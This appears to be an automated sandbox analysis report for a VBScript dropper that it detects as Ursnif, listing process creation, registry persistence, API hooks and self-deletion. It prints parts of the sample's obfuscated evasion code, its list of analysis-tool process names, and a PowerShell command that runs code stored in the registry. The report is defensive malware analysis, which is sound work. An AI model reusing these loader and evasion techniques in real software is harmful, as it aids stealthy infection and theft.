                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F22102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B68F86DF-9DC3-5870-D74A-210CFB1EE500}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_01
                    Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{F660447E-DDE3-9893-178A-614C3B5E2540}
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: sample.vbsStatic file information: File size 1397160 > 1048576
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    VBScript performs obfuscated calls to suspicious functionsShow sources
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                    Suspicious powershell command line foundShow sources
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F27AB0 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F27E1F push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0575528F push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'

                    Persistence and Installation Behavior:

                    barindex
                    Creates processes via WMIShow sources
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dllJump to dropped file
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY
                    Hooks registry keys query functions (used to hide registry keys)Show sources
                    Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                    Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                    Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                    Deletes itself after installationShow sources
                    Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\sample.vbsJump to behavior
                    Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                    Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
                    Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                    Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeKey value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDateJump to behavior
                    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: DEBUG: FS_CM - TRUESBIECTRL.EXE@
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXEP
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE(
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXEP
